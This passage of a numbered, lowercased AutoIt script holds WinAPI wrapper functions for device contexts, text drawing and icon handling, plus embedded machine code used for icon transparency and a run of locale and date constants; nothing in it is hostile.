  2940. Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc)
  2941. If @error Then Return SetError(@error, @extended, False)
  2942. Return $aresult[0]
  2943. EndFunc
  2944.  
  2945. Func _winapi_drawedge($hdc, $trect, $iedgetype, $iflags)
  2946. Local $aresult = DllCall("user32.dll", "bool", "DrawEdge", "handle", $hdc, "struct*", $trect, "uint", $iedgetype, "uint", $iflags)
  2947. If @error Then Return SetError(@error, @extended, False)
  2948. Return $aresult[0]
  2949. EndFunc
  2950.  
  2951. Func _winapi_drawframecontrol($hdc, $trect, $itype, $istate)
  2952. Local $aresult = DllCall("user32.dll", "bool", "DrawFrameControl", "handle", $hdc, "struct*", $trect, "uint", $itype, "uint", $istate)
  2953. If @error Then Return SetError(@error, @extended, False)
  2954. Return $aresult[0]
  2955. EndFunc
  2956.  
  2957. Func _winapi_drawicon($hdc, $ix, $iy, $hicon)
  2958. Local $aresult = DllCall("user32.dll", "bool", "DrawIcon", "handle", $hdc, "int", $ix, "int", $iy, "handle", $hicon)
  2959. If @error Then Return SetError(@error, @extended, False)
  2960. Return $aresult[0]
  2961. EndFunc
  2962.  
  2963. Func _winapi_drawiconex($hdc, $ix, $iy, $hicon, $iwidth = 0, $iheight = 0, $istep = 0, $hbrush = 0, $iflags = 3)
  2964. Local $ioptions
  2965. Switch $iflags
  2966. Case 1
  2967. $ioptions = $di_mask
  2968. Case 2
  2969. $ioptions = $di_image
  2970. Case 3
  2971. $ioptions = $di_normal
  2972. Case 4
  2973. $ioptions = $di_compat
  2974. Case 5
  2975. $ioptions = $di_defaultsize
  2976. Case Else
  2977. $ioptions = $di_nomirror
  2978. EndSwitch
  2979. Local $aresult = DllCall("user32.dll", "bool", "DrawIconEx", "handle", $hdc, "int", $ix, "int", $iy, "handle", $hicon, "int", $iwidth, "int", $iheight, "uint", $istep, "handle", $hbrush, "uint", $ioptions)
  2980. If @error Then Return SetError(@error, @extended, False)
  2981. Return $aresult[0]
  2982. EndFunc
  2983.  
  2984. Func _winapi_drawtext($hdc, $stext, ByRef $trect, $iflags)
  2985. Local $aresult = DllCall("user32.dll", "int", "DrawTextW", "handle", $hdc, "wstr", $stext, "int", -1, "struct*", $trect, "uint", $iflags)
  2986. If @error Then Return SetError(@error, @extended, 0)
  2987. Return $aresult[0]
  2988. EndFunc
  2989.  
  2990. Func _winapi_enumdisplaydevices($sdevice, $idevnum)
  2991. Local $tname = 0, $iflags = 0, $adevice[5]
  2992. If $sdevice <> "" Then
  2993. $tname = DllStructCreate("wchar Text[" & StringLen($sdevice) + 1 & "]")
  2994. DllStructSetData($tname, "Text", $sdevice)
  2995. EndIf
  2996. Local Const $tagdisplay_device = "dword Size;wchar Name[32];wchar String[128];dword Flags;wchar ID[128];wchar Key[128]"
  2997. Local $tdevice = DllStructCreate($tagdisplay_device)
  2998. Local $idevice = DllStructGetSize($tdevice)
  2999. DllStructSetData($tdevice, "Size", $idevice)
  3000. Local $aret = DllCall("user32.dll", "bool", "EnumDisplayDevicesW", "struct*", $tname, "dword", $idevnum, "struct*", $tdevice, "dword", 1)
  3001. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  3002. Local $in = DllStructGetData($tdevice, "Flags")
  3003. If BitAND($in, $display_device_attached_to_desktop) <> 0 Then $iflags = BitOR($iflags, 1)
  3004. If BitAND($in, $display_device_primary_device) <> 0 Then $iflags = BitOR($iflags, 2)
  3005. If BitAND($in, $display_device_mirroring_driver) <> 0 Then $iflags = BitOR($iflags, 4)
  3006. If BitAND($in, $display_device_vga_compatible) <> 0 Then $iflags = BitOR($iflags, 8)
  3007. If BitAND($in, $display_device_removable) <> 0 Then $iflags = BitOR($iflags, 16)
  3008. If BitAND($in, $display_device_modespruned) <> 0 Then $iflags = BitOR($iflags, 32)
  3009. $adevice[0] = True
  3010. $adevice[1] = DllStructGetData($tdevice, "Name")
  3011. $adevice[2] = DllStructGetData($tdevice, "String")
  3012. $adevice[3] = $iflags
  3013. $adevice[4] = DllStructGetData($tdevice, "ID")
  3014. Return $adevice
  3015. EndFunc
  3016.  
  3017. Func _winapi_fillrect($hdc, $trect, $hbrush)
  3018. Local $aresult
  3019. If IsPtr($hbrush) Then
  3020. $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $trect, "handle", $hbrush)
  3021. Else
  3022. $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $trect, "dword_ptr", $hbrush)
  3023. EndIf
  3024. If @error Then Return SetError(@error, @extended, False)
  3025. Return $aresult[0]
  3026. EndFunc
  3027.  
  3028. Func _winapi_framerect($hdc, $trect, $hbrush)
  3029. Local $aresult = DllCall("user32.dll", "int", "FrameRect", "handle", $hdc, "struct*", $trect, "handle", $hbrush)
  3030. If @error Then Return SetError(@error, @extended, False)
  3031. Return $aresult[0]
  3032. EndFunc
  3033.  
  3034. Func _winapi_getbkmode($hdc)
  3035. Local $aresult = DllCall("gdi32.dll", "int", "GetBkMode", "handle", $hdc)
  3036. If @error Then Return SetError(@error, @extended, 0)
  3037. Return $aresult[0]
  3038. EndFunc
  3039.  
  3040. Func _winapi_getdc($hwnd)
  3041. Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd)
  3042. If @error Then Return SetError(@error, @extended, 0)
  3043. Return $aresult[0]
  3044. EndFunc
  3045.  
  3046. Func _winapi_getdcex($hwnd, $hrgn, $iflags)
  3047. Local $aret = DllCall("user32.dll", "handle", "GetDCEx", "hwnd", $hwnd, "handle", $hrgn, "dword", $iflags)
  3048. If @error Then Return SetError(@error, @extended, 0)
  3049. Return $aret[0]
  3050. EndFunc
  3051.  
  3052. Func _winapi_getdevicecaps($hdc, $iindex)
  3053. Local $aresult = DllCall("gdi32.dll", "int", "GetDeviceCaps", "handle", $hdc, "int", $iindex)
  3054. If @error Then Return SetError(@error, @extended, 0)
  3055. Return $aresult[0]
  3056. EndFunc
  3057.  
  3058. Func _winapi_gettextcolor($hdc)
  3059. Local $aret = DllCall("gdi32.dll", "dword", "GetTextColor", "handle", $hdc)
  3060. If @error OR ($aret[0] = 4294967295) Then Return SetError(@error, @extended, -1)
  3061. Return __rgb($aret[0])
  3062. EndFunc
  3063.  
  3064. Func _winapi_getwindowdc($hwnd)
  3065. Local $aresult = DllCall("user32.dll", "handle", "GetWindowDC", "hwnd", $hwnd)
  3066. If @error Then Return SetError(@error, @extended, 0)
  3067. Return $aresult[0]
  3068. EndFunc
  3069.  
  3070. Func _winapi_printwindow($hwnd, $hdc, $bclient = False)
  3071. Local $aret = DllCall("user32.dll", "bool", "PrintWindow", "hwnd", $hwnd, "handle", $hdc, "uint", $bclient)
  3072. If @error Then Return SetError(@error, @extended, False)
  3073. Return $aret[0]
  3074. EndFunc
  3075.  
  3076. Func _winapi_releasedc($hwnd, $hdc)
  3077. Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc)
  3078. If @error Then Return SetError(@error, @extended, False)
  3079. Return $aresult[0]
  3080. EndFunc
  3081.  
  3082. Func _winapi_restoredc($hdc, $iid)
  3083. Local $aret = DllCall("gdi32.dll", "bool", "RestoreDC", "handle", $hdc, "int", $iid)
  3084. If @error Then Return SetError(@error, @extended, False)
  3085. Return $aret[0]
  3086. EndFunc
  3087.  
  3088. Func _winapi_savedc($hdc)
  3089. Local $aret = DllCall("gdi32.dll", "int", "SaveDC", "handle", $hdc)
  3090. If @error Then Return SetError(@error, @extended, 0)
  3091. Return $aret[0]
  3092. EndFunc
  3093.  
  3094. Func _winapi_setbkcolor($hdc, $icolor)
  3095. Local $aresult = DllCall("gdi32.dll", "INT", "SetBkColor", "handle", $hdc, "INT", $icolor)
  3096. If @error Then Return SetError(@error, @extended, -1)
  3097. Return $aresult[0]
  3098. EndFunc
  3099.  
  3100. Func _winapi_setbkmode($hdc, $ibkmode)
  3101. Local $aresult = DllCall("gdi32.dll", "int", "SetBkMode", "handle", $hdc, "int", $ibkmode)
  3102. If @error Then Return SetError(@error, @extended, 0)
  3103. Return $aresult[0]
  3104. EndFunc
  3105.  
  3106. Func _winapi_settextcolor($hdc, $icolor)
  3107. Local $aresult = DllCall("gdi32.dll", "INT", "SetTextColor", "handle", $hdc, "INT", $icolor)
  3108. If @error Then Return SetError(@error, @extended, -1)
  3109. Return $aresult[0]
  3110. EndFunc
  3111.  
  3112. Func _winapi_twipsperpixelx()
  3113. Local $hdc, $itwipsperpixelx
  3114. $hdc = _winapi_getdc(0)
  3115. Local Const $__winapiconstant_logpixelsx = 88
  3116. $itwipsperpixelx = 1440 / _winapi_getdevicecaps($hdc, $__winapiconstant_logpixelsx)
  3117. _winapi_releasedc(0, $hdc)
  3118. Return $itwipsperpixelx
  3119. EndFunc
  3120.  
  3121. Func _winapi_twipsperpixely()
  3122. Local $hdc, $itwipsperpixely
  3123. $hdc = _winapi_getdc(0)
  3124. Local Const $__winapiconstant_logpixelsy = 90
  3125. $itwipsperpixely = 1440 / _winapi_getdevicecaps($hdc, $__winapiconstant_logpixelsy)
  3126. _winapi_releasedc(0, $hdc)
  3127. Return $itwipsperpixely
  3128. EndFunc
  3129.  
  3130. #EndRegion Public Functions
  3131. #Region Internal Functions
  3132. #EndRegion Internal Functions
  3133. #Region Global Variables and Constants
  3134. #EndRegion Global Variables and Constants
  3135. #Region Functions list
  3136. #EndRegion Functions list
  3137. #Region Public Functions
  3138. Global Const $tagiconinfo = "bool Icon;dword XHotSpot;dword YHotSpot;handle hMask;handle hColor"
  3139.  
  3140. Func _winapi_addicontransparency($hicon, $ipercent = 50, $bdelete = False)
  3141. Local $tbitmap, $hdib = 0, $hresult = 0
  3142. Local $ahbitmap[2]
  3143. Local $ticoninfo = DllStructCreate($tagiconinfo)
  3144. Local $aret = DllCall("user32.dll", "bool", "GetIconInfo", "handle", $hicon, "struct*", $ticoninfo)
  3145. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  3146. For $i = 0 To 1
  3147. $ahbitmap[$i] = DllStructGetData($ticoninfo, $i + 4)
  3148. Next
  3149. Local $ierror = 0
  3150. Do
  3151. $hdib = _winapi_copybitmap($ahbitmap[1])
  3152. If NOT $hdib Then
  3153. $ierror = 20
  3154. ExitLoop
  3155. EndIf
  3156. $tbitmap = DllStructCreate($tagbitmap)
  3157. If (NOT _winapi_getobject($hdib, DllStructGetSize($tbitmap), $tbitmap)) OR (DllStructGetData($tbitmap, "bmBitsPixel") <> 32) Then
  3158. $ierror = 21
  3159. ExitLoop
  3160. EndIf
  3161. $aret = DllCall("user32.dll", "lresult", "CallWindowProc", "PTR", __transparencyproc(), "hwnd", 0, "uint", $ipercent, "wparam", DllStructGetPtr($tbitmap), "lparam", 0)
  3162. If @error OR NOT $aret[0] Then
  3163. $ierror = @error + 30
  3164. ExitLoop
  3165. EndIf
  3166. If $aret[0] = -1 Then
  3167. $hresult = _winapi_createemptyicon(DllStructGetData($tbitmap, "bmWidth"), DllStructGetData($tbitmap, "bmHeight"))
  3168. Else
  3169. $hresult = _winapi_createiconindirect($hdib, $ahbitmap[0])
  3170. EndIf
  3171. If NOT $hresult Then $ierror = 22
  3172. Until 1
  3173. If $hdib Then
  3174. _winapi_deleteobject($hdib)
  3175. EndIf
  3176. For $i = 0 To 1
  3177. If $ahbitmap[$i] Then
  3178. _winapi_deleteobject($ahbitmap[$i])
  3179. EndIf
  3180. Next
  3181. If $ierror Then Return SetError($ierror, 0, 0)
  3182. If $bdelete Then
  3183. _winapi_destroyicon($hicon)
  3184. EndIf
  3185. Return $hresult
  3186. EndFunc
  3187.  
  3188. Func _winapi_copyicon($hicon)
  3189. Local $aresult = DllCall("user32.dll", "handle", "CopyIcon", "handle", $hicon)
  3190. If @error Then Return SetError(@error, @extended, 0)
  3191. Return $aresult[0]
  3192. EndFunc
  3193.  
  3194. Func _winapi_create32bithicon($hicon, $bdelete = False)
  3195. Local $ahbitmap[2], $hresult = 0
  3196. Local $adib[2][2] = [[0, 0], [0, 0]]
  3197. Local $ticoninfo = DllStructCreate($tagiconinfo)
  3198. Local $aret = DllCall("user32.dll", "bool", "GetIconInfo", "handle", $hicon, "struct*", $ticoninfo)
  3199. If @error Then Return SetError(@error, @extended, 0)
  3200. If NOT $aret[0] Then Return SetError(10, 0, 0)
  3201. For $i = 0 To 1
  3202. $ahbitmap[$i] = DllStructGetData($ticoninfo, $i + 4)
  3203. Next
  3204. If _winapi_isalphabitmap($ahbitmap[1]) Then
  3205. $adib[0][0] = _winapi_createandbitmap($ahbitmap[1])
  3206. If NOT @error Then
  3207. $hresult = _winapi_createiconindirect($ahbitmap[1], $adib[0][0])
  3208. EndIf
  3209. Else
  3210. Local $tsize = _winapi_getbitmapdimension($ahbitmap[1])
  3211. Local $asize[2]
  3212. For $i = 0 To 1
  3213. $asize[$i] = DllStructGetData($tsize, $i + 1)
  3214. Next
  3215. Local $hsrcdc = _winapi_createcompatibledc(0)
  3216. Local $hdstdc = _winapi_createcompatibledc(0)
  3217. Local $hsrcsv, $hdstsv
  3218. For $i = 0 To 1
  3219. $adib[$i][0] = _winapi_createdib($asize[0], $asize[1])
  3220. $adib[$i][1] = $__g_vext
  3221. $hsrcsv = _winapi_selectobject($hsrcdc, $ahbitmap[$i])
  3222. $hdstsv = _winapi_selectobject($hdstdc, $adib[$i][0])
  3223. _winapi_bitblt($hdstdc, 0, 0, $asize[0], $asize[1], $hsrcdc, 0, 0, 12583114)
  3224. _winapi_selectobject($hsrcdc, $hsrcsv)
  3225. _winapi_selectobject($hdstdc, $hdstsv)
  3226. Next
  3227. _winapi_deletedc($hsrcdc)
  3228. _winapi_deletedc($hdstdc)
  3229. $aret = DllCall("user32.dll", "lresult", "CallWindowProc", "ptr", __xorproc(), "ptr", 0, "uint", $asize[0] * $asize[1] * 4, "wparam", $adib[0][1], "lparam", $adib[1][1])
  3230. If NOT @error AND $aret[0] Then
  3231. $hresult = _winapi_createiconindirect($adib[1][0], $ahbitmap[0])
  3232. EndIf
  3233. EndIf
  3234. For $i = 0 To 1
  3235. _winapi_deleteobject($ahbitmap[$i])
  3236. If $adib[$i][0] Then
  3237. _winapi_deleteobject($adib[$i][0])
  3238. EndIf
  3239. Next
  3240. If NOT $hresult Then Return SetError(11, 0, 0)
  3241. If $bdelete Then
  3242. _winapi_destroyicon($hicon)
  3243. EndIf
  3244. Return $hresult
  3245. EndFunc
  3246.  
  3247. Func _winapi_createemptyicon($iwidth, $iheight, $ibitsperpel = 32)
  3248. Local $hxor = _winapi_createdib($iwidth, $iheight, $ibitsperpel)
  3249. Local $hand = _winapi_createdib($iwidth, $iheight, 1)
  3250. Local $hdc = _winapi_createcompatibledc(0)
  3251. Local $hsv = _winapi_selectobject($hdc, $hand)
  3252. Local $hbrush = _winapi_createsolidbrush(16777215)
  3253. Local $trect = _winapi_createrect(0, 0, $iwidth, $iheight)
  3254. _winapi_fillrect($hdc, $trect, $hbrush)
  3255. _winapi_deleteobject($hbrush)
  3256. _winapi_selectobject($hdc, $hsv)
  3257. _winapi_deletedc($hdc)
  3258. Local $hicon = _winapi_createiconindirect($hxor, $hand)
  3259. Local $ierror = @error
  3260. If $hxor Then
  3261. _winapi_deleteobject($hxor)
  3262. EndIf
  3263. If $hand Then
  3264. _winapi_deleteobject($hand)
  3265. EndIf
  3266. If NOT $hicon Then Return SetError($ierror + 10, 0, 0)
  3267. Return $hicon
  3268. EndFunc
  3269.  
  3270. Func _winapi_createicon($hinstance, $iwidth, $iheight, $iplanes, $ibitspixel, $pandbits, $pxorbits)
  3271. Local $aret = DllCall("user32.dll", "handle", "CreateIcon", "handle", $hinstance, "int", $iwidth, "int", $iheight, "byte", $iplanes, "byte", $ibitspixel, "struct*", $pandbits, "struct*", $pxorbits)
  3272. If @error Then Return SetError(@error, @extended, 0)
  3273. Return $aret[0]
  3274. EndFunc
  3275.  
  3276. Func _winapi_createiconfromresourceex($pdata, $isize, $bicon = True, $ixdesiredpixels = 0, $iydesiredpixels = 0, $iflags = 0)
  3277. Local $aret = DllCall("user32.dll", "handle", "CreateIconFromResourceEx", "ptr", $pdata, "dword", $isize, "bool", $bicon, "dword", 196608, "int", $ixdesiredpixels, "int", $iydesiredpixels, "uint", $iflags)
  3278. If @error Then Return SetError(@error, @extended, 0)
  3279. Return $aret[0]
  3280. EndFunc
  3281.  
  3282. Func _winapi_createiconindirect($hbitmap, $hmask, $ixhotspot = 0, $iyhotspot = 0, $bicon = True)
  3283. Local $ticoninfo = DllStructCreate($tagiconinfo)
  3284. DllStructSetData($ticoninfo, 1, $bicon)
  3285. DllStructSetData($ticoninfo, 2, $ixhotspot)
  3286. DllStructSetData($ticoninfo, 3, $iyhotspot)
  3287. DllStructSetData($ticoninfo, 4, $hmask)
  3288. DllStructSetData($ticoninfo, 5, $hbitmap)
  3289. Local $aret = DllCall("user32.dll", "handle", "CreateIconIndirect", "struct*", $ticoninfo)
  3290. If @error Then Return SetError(@error, @extended, 0)
  3291. Return $aret[0]
  3292. EndFunc
  3293.  
  3294. Func _winapi_destroyicon($hicon)
  3295. Local $aresult = DllCall("user32.dll", "bool", "DestroyIcon", "handle", $hicon)
  3296. If @error Then Return SetError(@error, @extended, False)
  3297. Return $aresult[0]
  3298. EndFunc
  3299.  
  3300. Func _winapi_extracticon($sicon, $iindex, $bsmall = False)
  3301. Local $plarge, $psmall, $tptr = DllStructCreate("ptr")
  3302. If $bsmall Then
  3303. $plarge = 0
  3304. $psmall = DllStructGetPtr($tptr)
  3305. Else
  3306. $plarge = DllStructGetPtr($tptr)
  3307. $psmall = 0
  3308. EndIf
  3309. DllCall("shell32.dll", "uint", "ExtractIconExW", "wstr", $sicon, "int", $iindex, "ptr", $plarge, "ptr", $psmall, "uint", 1)
  3310. If @error Then Return SetError(@error, @extended, 0)
  3311. Return DllStructGetData($tptr, 1)
  3312. EndFunc
  3313.  
  3314. Func _winapi_extracticonex($sfilepath, $iindex, $palarge, $pasmall, $iicons)
  3315. Local $aresult = DllCall("shell32.dll", "uint", "ExtractIconExW", "wstr", $sfilepath, "int", $iindex, "struct*", $palarge, "struct*", $pasmall, "uint", $iicons)
  3316. If @error Then Return SetError(@error, @extended, 0)
  3317. Return $aresult[0]
  3318. EndFunc
  3319.  
  3320. Func _winapi_fileiconinit($brestore = True)
  3321. Local $aret = DllCall("shell32.dll", "int", 660, "int", $brestore)
  3322. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  3323. Return 1
  3324. EndFunc
  3325.  
  3326. Func _winapi_geticondimension($hicon)
  3327. Local $ticoninfo = DllStructCreate($tagiconinfo)
  3328. Local $aret = DllCall("user32.dll", "bool", "GetIconInfo", "handle", $hicon, "struct*", $ticoninfo)
  3329. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  3330. Local $tsize = _winapi_getbitmapdimension(DllStructGetData($ticoninfo, 5))
  3331. For $i = 4 To 5
  3332. _winapi_deleteobject(DllStructGetData($ticoninfo, $i))
  3333. Next
  3334. If NOT IsDllStruct($tsize) Then Return SetError(20, 0, 0)
  3335. Return $tsize
  3336. EndFunc
  3337.  
  3338. Func _winapi_geticoninfo($hicon)
  3339. Local $tinfo = DllStructCreate($tagiconinfo)
  3340. Local $aret = DllCall("user32.dll", "bool", "GetIconInfo", "handle", $hicon, "struct*", $tinfo)
  3341. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  3342. Local $aicon[6]
  3343. $aicon[0] = True
  3344. $aicon[1] = DllStructGetData($tinfo, "Icon") <> 0
  3345. $aicon[2] = DllStructGetData($tinfo, "XHotSpot")
  3346. $aicon[3] = DllStructGetData($tinfo, "YHotSpot")
  3347. $aicon[4] = DllStructGetData($tinfo, "hMask")
  3348. $aicon[5] = DllStructGetData($tinfo, "hColor")
  3349. Return $aicon
  3350. EndFunc
  3351.  
  3352. Func _winapi_geticoninfoex($hicon)
  3353. Local $tiiex = DllStructCreate("dword;int;dword;dword;ptr;ptr;ushort;wchar[260];wchar[260]")
  3354. DllStructSetData($tiiex, 1, DllStructGetSize($tiiex))
  3355. Local $aret = DllCall("user32.dll", "bool", "GetIconInfoExW", "handle", $hicon, "struct*", $tiiex)
  3356. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  3357. Local $aresult[8]
  3358. For $i = 0 To 7
  3359. $aresult[$i] = DllStructGetData($tiiex, $i + 2)
  3360. Next
  3361. Return $aresult
  3362. EndFunc
  3363.  
  3364. Func _winapi_loadicon($hinstance, $sname)
  3365. Local $stypeofname = "int"
  3366. If IsString($sname) Then
  3367. $stypeofname = "wstr"
  3368. EndIf
  3369. Local $aret = DllCall("user32.dll", "handle", "LoadIconW", "handle", $hinstance, $stypeofname, $sname)
  3370. If @error Then Return SetError(@error, @extended, 0)
  3371. Return $aret[0]
  3372. EndFunc
  3373.  
  3374. Func _winapi_loadiconmetric($hinstance, $sname, $imetric)
  3375. Local $stypeofname = "int"
  3376. If IsString($sname) Then
  3377. $stypeofname = "wstr"
  3378. EndIf
  3379. Local $aret = DllCall("comctl32.dll", "long", "LoadIconMetric", "handle", $hinstance, $stypeofname, $sname, "int", $imetric, "handle*", 0)
  3380. If @error Then Return SetError(@error, @extended, 0)
  3381. If $aret[0] Then Return SetError(10, $aret[0], 0)
  3382. Return $aret[4]
  3383. EndFunc
  3384.  
  3385. Func _winapi_loadiconwithscaledown($hinstance, $sname, $iwidth, $iheight)
  3386. Local $stypeofname = "int"
  3387. If IsString($sname) Then
  3388. $stypeofname = "wstr"
  3389. EndIf
  3390. Local $aret = DllCall("comctl32.dll", "long", "LoadIconWithScaleDown", "handle", $hinstance, $stypeofname, $sname, "int", $iwidth, "int", $iheight, "handle*", 0)
  3391. If @error Then Return SetError(@error, @extended, 0)
  3392. If $aret[0] Then Return SetError(10, $aret[0], 0)
  3393. Return $aret[5]
  3394. EndFunc
  3395.  
  3396. Func _winapi_loadshell32icon($iiconid)
  3397. Local $ticons = DllStructCreate("ptr Data")
  3398. Local $iicons = _winapi_extracticonex("shell32.dll", $iiconid, 0, $ticons, 1)
  3399. If @error Then Return SetError(@error, @extended, 0)
  3400. If $iicons <= 0 Then Return SetError(10, 0, 0)
  3401. Return DllStructGetData($ticons, "Data")
  3402. EndFunc
  3403.  
  3404. Func _winapi_lookupiconidfromdirectoryex($pdata, $bicon = True, $ixdesiredpixels = 0, $iydesiredpixels = 0, $iflags = 0)
  3405. Local $aret = DllCall("user32.dll", "int", "LookupIconIdFromDirectoryEx", "ptr", $pdata, "bool", $bicon, "int", $ixdesiredpixels, "int", $iydesiredpixels, "uint", $iflags)
  3406. If @error Then Return SetError(@error, @extended, 0)
  3407. Return $aret[0]
  3408. EndFunc
  3409.  
  3410. Func _winapi_mirroricon($hicon, $bdelete = False)
  3411. If NOT $bdelete Then
  3412. $hicon = _winapi_copyicon($hicon)
  3413. EndIf
  3414. Local $aret = DllCall("comctl32.dll", "int", 414, "ptr", 0, "ptr*", $hicon)
  3415. If @error OR NOT $aret[0] Then
  3416. Local $ierror = @error + 10
  3417. If $hicon AND NOT $bdelete Then
  3418. _winapi_destroyicon($hicon)
  3419. EndIf
  3420. Return SetError($ierror, 0, 0)
  3421. EndIf
  3422. Return $aret[2]
  3423. EndFunc
  3424.  
  3425. #EndRegion Public Functions
  3426. #Region Embedded DLL Functions
  3427.  
  3428. Func __transparencyproc()
  3429. Static $pproc = 0
  3430. If NOT $pproc Then
  3431. If @AutoItX64 Then
  3432. $pproc = __init(Binary("0x48894C240848895424104C894424184C894C24205541574831C0505050505050" & "4883EC284883BC24800000000074054831C0EB0748C7C0010000004821C07522" & "488BAC248000000048837D180074054831C0EB0748C7C0010000004821C07502" & "EB0948C7C001000000EB034831C04821C0740B4831C04863C0E93C0100004C63" & "7C24784983FF647E0F48C7C0010000004863C0E9220100004C637C24784D21FF" & "7D08C74424780000000048C74424280100000048C74424300000000048C74424" & "3800000000488BAC24800000004C637D04488BAC2480000000486345084C0FAF" & "F849C1E7024983C7FC4C3B7C24380F8C88000000488BAC24800000004C8B7D18" & "4C037C24384983C7034C897C2440488B6C2440480FB64500505888442448807C" & "244800744B4C0FB67C244848634424784C0FAFF84C89F848C7C1640000004899" & "48F7F94989C74C89F850488B6C244858884500488B6C2440807D0000740948C7" & "4424280000000048C7442430010000004883442438040F8149FFFFFF48837C24" & "3000741148837C242800740948C7C001000000EB034831C04821C0740E48C7C0" & "FFFFFFFF4863C0EB11EB0C48C7C0010000004863C0EB034831C04883C458415F" & "5DC3"))
  3433. Else
  3434. $pproc = __init(Binary("0x555331C05050505050837C242800740431C0EB05B80100000021C075198B6C24" & "28837D1400740431C0EB05B80100000021C07502EB07B801000000EB0231C021" & "C0740731C0E9E50000008B5C242483FB647E0AB801000000E9D20000008B5C24" & "2421DB7D08C744242400000000C7042401000000C744240400000000C7442408" & "000000008B6C24288B5D048B6C24280FAF5D08C1E30283C3FC3B5C24087C648B" & "6C24288B5D14035C240883C303895C240C8B6C240C0FB6450088442410807C24" & "100074380FB65C24100FAF5C242489D8B96400000099F7F989C3538B6C241058" & "8845008B6C240C807D00007407C7042400000000C74424040100000083442408" & "047181837C240400740D833C24007407B801000000EB0231C021C07409B8FFFF" & "FFFFEB0BEB07B801000000EB0231C083C4145B5DC21000"))
  3435. EndIf
  3436. EndIf
  3437. Return $pproc
  3438. EndFunc
  3439.  
  3440. #EndRegion Embedded DLL Functions
  3441. Global Const $linguistic_ignorecase = 16
  3442. Global Const $linguistic_ignorediacritic = 32
  3443. Global Const $norm_ignorecase = 1
  3444. Global Const $norm_ignorekanatype = 65536
  3445. Global Const $norm_ignorenonspace = 2
  3446. Global Const $norm_ignoresymbols = 4
  3447. Global Const $norm_ignorewidth = 131072
  3448. Global Const $norm_linguistic_casing = 134217728
  3449. Global Const $sort_digitsasnumbers = 8
  3450. Global Const $sort_stringsort = 4096
  3451. Global Const $cstr_less_than = 1
  3452. Global Const $cstr_equal = 2
  3453. Global Const $cstr_greater_than = 3
  3454. Global Const $mui_language_id = 4
  3455. Global Const $mui_language_name = 8
  3456. Global Const $date_autolayout = 64
  3457. Global Const $date_longdate = 2
  3458. Global Const $date_ltrreading = 16
  3459. Global Const $date_shortdate = 1
  3460. Global Const $date_rtlreading = 32
  3461. Global Const $date_use_alt_calendar = 4
  3462. Global Const $date_yearmonth = 8
  3463. Global Const $geo_nation = 1
  3464. Global Const $geo_latitude = 2
  3465. Global Const $geo_longitude = 3
  3466. Global Const $geo_iso2 = 4
  3467. Global Const $geo_iso3 = 5
  3468. Global Const $geo_rfc1766 = 6
  3469. Global Const $geo_lcid = 7
  3470. Global Const $geo_friendlyname = 8
  3471. Global Const $geo_officialname = 9
  3472. Global Const $geo_timezones = 10
  3473. Global Const $geo_officiallanguages = 11
  3474. Global Const $geo_iso_un_number = 12
  3475. Global Const $geo_parent = 13
  3476. Global Const $locale_ilanguage = 1
  3477. Global Const $locale_slanguage = 2
  3478. Global Const $locale_senglanguage = 4097
  3479. Global Const $locale_sabbrevlangname = 3
  3480. Global Const $locale_snativelangname = 4
  3481. Global Const $locale_icountry = 5
  3482. Global Const $locale_scountry = 6
  3483. Global Const $locale_sengcountry = 4098
  3484. Global Const $locale_sabbrevctryname = 7
  3485. Global Const $locale_snativectryname = 8
  3486. Global Const $locale_idefaultlanguage = 9
  3487. Global Const $locale_idefaultcountry = 10
  3488. Global Const $locale_idefaultcodepage = 11
  3489. Global Const $locale_idefaultansicodepage = 4100
  3490. Global Const $locale_idefaultmaccodepage = 4113
  3491. Global Const $locale_slist = 12
  3492. Global Const $locale_imeasure = 13
  3493. Global Const $locale_sdecimal = 14
  3494. Global Const $locale_sthousand = 15
  3495. Global Const $locale_sgrouping = 16
  3496. Global Const $locale_idigits = 17
  3497. Global Const $locale_ilzero = 18
  3498. Global Const $locale_inegnumber = 4112
  3499. Global Const $locale_snativedigits = 19
  3500. Global Const $locale_scurrency = 20
  3501. Global Const $locale_sintlsymbol = 21
  3502. Global Const $locale_smondecimalsep = 22
  3503. Global Const $locale_smonthousandsep = 23
  3504. Global Const $locale_smongrouping = 24
  3505. Global Const $locale_icurrdigits = 25
  3506. Global Const $locale_iintlcurrdigits = 26
  3507. Global Const $locale_icurrency = 27
  3508. Global Const $locale_inegcurr = 28
  3509. Global Const $locale_sdate = 29
  3510. Global Const $locale_stime = 30
  3511. Global Const $locale_sshortdate = 31
  3512. Global Const $locale_slongdate = 32
  3513. Global Const $locale_stimeformat = 4099
  3514. Global Const $locale_idate = 33
  3515. Global Const $locale_ildate = 34
  3516. Global Const $locale_itime = 35
  3517. Global Const $locale_itimemarkposn = 4101
  3518. Global Const $locale_icentury = 36
  3519. Global Const $locale_itlzero = 37
  3520. Global Const $locale_idaylzero = 38
  3521. Global Const $locale_imonlzero = 39
  3522. Global Const $locale_s1159 = 40
  3523. Global Const $locale_s2359 = 41
  3524. Global Const $locale_icalendartype = 4105
  3525. Global Const $locale_ioptionalcalendar = 4107
  3526. Global Const $locale_ifirstdayofweek = 4108
  3527. Global Const $locale_ifirstweekofyear = 4109
  3528. Global Const $locale_sdayname1 = 42
  3529. Global Const $locale_sdayname2 = 43
  3530. Global Const $locale_sdayname3 = 44
  3531. Global Const $locale_sdayname4 = 45
  3532. Global Const $locale_sdayname5 = 46
  3533. Global Const $locale_sdayname6 = 47
  3534. Global Const $locale_sdayname7 = 48
  3535. Global Const $locale_sabbrevdayname1 = 49
  3536. Global Const $locale_sabbrevdayname2 = 50
  3537. Global Const $locale_sabbrevdayname3 = 51
  3538. Global Const $locale_sabbrevdayname4 = 52
  3539. Global Const $locale_sabbrevdayname5 = 53
  3540. Global Const $locale_sabbrevdayname6 = 54
